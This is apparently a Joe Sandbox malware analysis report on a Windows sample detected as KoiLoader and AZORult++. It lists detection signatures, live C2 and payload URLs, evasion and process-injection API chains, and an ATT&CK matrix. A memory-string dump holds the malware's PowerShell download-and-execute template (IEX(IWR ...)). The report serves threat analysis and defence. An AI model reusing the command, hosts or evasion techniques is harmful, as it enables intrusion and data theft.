Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tcmeimnnMZ.exe

Overview

General Information

Sample name:tcmeimnnMZ.exe
renamed because original name is a hash value
Original sample name:b3e62e0daf3abe85e035558fed736e91.exe
Analysis ID:1528831
MD5:b3e62e0daf3abe85e035558fed736e91
SHA1:bfe4ef22d4b4ab14480bc6d71acf677e7f111b29
SHA256:b09ce5d71929178f5d40479c2c7a4eadd86e4e7f182124702d5fdb0ce393d2ba
Tags:exeKoiLoaderuser-abuse_ch
Infos:

Detection

AZORult++, KoiLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected AZORult++ Trojan
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected KoiLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • tcmeimnnMZ.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\tcmeimnnMZ.exe" MD5: B3E62E0DAF3ABE85E035558FED736E91)
  • cleanup
{"C2": "http://121.127.33.20/fermentum.php", "Payload url": "https://kionaonline.com/modules/bonslick"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
    00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
      Process Memory Space: tcmeimnnMZ.exe PID: 7432JoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.tcmeimnnMZ.exe.ee17f0.2.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
          0.2.tcmeimnnMZ.exe.e40000.1.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
            0.2.tcmeimnnMZ.exe.ee17f0.2.raw.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: tcmeimnnMZ.exeAvira: detected
              Source: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: KoiLoader {"C2": "http://121.127.33.20/fermentum.php", "Payload url": "https://kionaonline.com/modules/bonslick"}
              Source: tcmeimnnMZ.exeReversingLabs: Detection: 71%
              Source: tcmeimnnMZ.exeVirustotal: Detection: 77%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: tcmeimnnMZ.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E48FC0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00E48FC0
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E48380 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,0_2_00E48380
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E48356 Sleep,Sleep,Sleep,InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,0_2_00E48356
              Source: tcmeimnnMZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: tcmeimnnMZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E48660 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_00E48660

              Networking

              barindex
              Source: Malware configuration extractorURLs: http://121.127.33.20/fermentum.php
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E466E0 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00E466E0
              Source: tcmeimnnMZ.exeString found in binary or memory: http://121.127.33.20/fermentum.php
              Source: tcmeimnnMZ.exe, 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.127.33.20/fermentum.php%temp%
              Source: tcmeimnnMZ.exeString found in binary or memory: https://kionaonline.com/modules/bonslick
              Source: tcmeimnnMZ.exe, 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kionaonline.com/modules/bonslick/c

              E-Banking Fraud

              barindex
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E48E60 EntryPoint,GetUserDefaultLangID,ExitProcess,0_2_00E48E60
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E45EB0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,0_2_00E45EB0
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E45B30 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_00E45B30
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_0062E87D0_2_0062E87D
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E424E00_2_00E424E0
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E478A00_2_00E478A0
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E474800_2_00E47480
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E442A00_2_00E442A0
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E446A00_2_00E446A0
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: String function: 00623040 appears 46 times
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: String function: 00624480 appears 33 times
              Source: tcmeimnnMZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@1/0@0/0
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E46250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_00E46250
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E46C00 ExpandEnvironmentStringsW,VariantInit,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear,0_2_00E46C00
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCommand line argument: jhl46745fghb0_2_00622F40
              Source: tcmeimnnMZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: tcmeimnnMZ.exeReversingLabs: Detection: 71%
              Source: tcmeimnnMZ.exeVirustotal: Detection: 77%
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeSection loaded: sspicli.dllJump to behavior
              Source: tcmeimnnMZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: tcmeimnnMZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: tcmeimnnMZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: tcmeimnnMZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: tcmeimnnMZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: tcmeimnnMZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: tcmeimnnMZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: tcmeimnnMZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: tcmeimnnMZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: tcmeimnnMZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: tcmeimnnMZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: tcmeimnnMZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: tcmeimnnMZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 0.2.tcmeimnnMZ.exe.ee17f0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.tcmeimnnMZ.exe.e40000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.tcmeimnnMZ.exe.ee17f0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: tcmeimnnMZ.exe PID: 7432, type: MEMORYSTR
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00621300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_00621300

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_00E48660
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_00E48660
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-10476
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-10640
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeFile opened / queried: C:\Windows\System32\VBoxService.exeJump to behavior
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeAPI coverage: 9.9 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E48660 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_00E48660
              Source: tcmeimnnMZ.exeBinary or memory string: Hyper-V
              Source: tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: POST%s|%s|VoYGkc5RStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://121.127.33.20/fermentum.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://kionaonline.com/modules/bonslick/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
              Source: tcmeimnnMZ.exeBinary or memory string: VMWare
              Source: tcmeimnnMZ.exeBinary or memory string: %systemroot%\System32\VBoxService.exe
              Source: tcmeimnnMZ.exeBinary or memory string: %systemroot%\System32\VBoxTray.exe
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeAPI call chain: ExitProcess graph end nodegraph_0-10579
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeAPI call chain: ExitProcess graph end nodegraph_0-10759
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_0062695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0062695B
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00621300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_00621300
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00621710 mov ecx, dword ptr fs:[00000030h]0_2_00621710
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_006275A2 mov eax, dword ptr fs:[00000030h]0_2_006275A2
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00629763 mov eax, dword ptr fs:[00000030h]0_2_00629763
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E45EB0 mov eax, dword ptr fs:[00000030h]0_2_00E45EB0
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E47690 mov eax, dword ptr fs:[00000030h]0_2_00E47690
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_0062A845 GetProcessHeap,0_2_0062A845
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00623D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00623D4E
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_0062695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0062695B
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_0062421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0062421C
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_006243AF SetUnhandledExceptionFilter,0_2_006243AF

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E45B30 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_00E45B30
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_006244C5 cpuid 0_2_006244C5
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00624103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00624103
              Source: C:\Users\user\Desktop\tcmeimnnMZ.exeCode function: 0_2_00E48660 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_00E48660
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              21
              Virtualization/Sandbox Evasion
              OS Credential Dumping1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts21
              Native API
              Boot or Logon Initialization Scripts1
              Process Injection
              1
              Access Token Manipulation
              LSASS Memory231
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              1
              Process Injection
              Security Account Manager21
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive1
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information
              NTDS1
              Account Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information
              LSA Secrets1
              System Owner/User Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync112
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              tcmeimnnMZ.exe71%ReversingLabsWin32.Trojan.AZORult
              tcmeimnnMZ.exe78%VirustotalBrowse
              tcmeimnnMZ.exe100%AviraTR/Kryptik.ujyuz
              tcmeimnnMZ.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://kionaonline.com/modules/bonslick0%VirustotalBrowse
              https://kionaonline.com/modules/bonslick/c0%VirustotalBrowse
              http://121.127.33.20/fermentum.php%temp%0%VirustotalBrowse
              http://121.127.33.20/fermentum.php1%VirustotalBrowse
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://121.127.33.20/fermentum.phptrueunknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://kionaonline.com/modules/bonslicktcmeimnnMZ.exetrueunknown
              http://121.127.33.20/fermentum.php%temp%tcmeimnnMZ.exe, 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://kionaonline.com/modules/bonslick/ctcmeimnnMZ.exe, 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              No contacted IP infos
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1528831
              Start date and time:2024-10-08 10:31:25 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 1m 55s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:1
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:tcmeimnnMZ.exe
              renamed because original name is a hash value
              Original Sample Name:b3e62e0daf3abe85e035558fed736e91.exe
              Detection:MAL
              Classification:mal100.bank.troj.evad.winEXE@1/0@0/0
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 96%
              • Number of executed functions: 5
              • Number of non-executed functions: 67
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Stop behavior analysis, all processes terminated
              No simulations
              No context
              No context
              No context
              No context
              No context
              No created / dropped files found
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
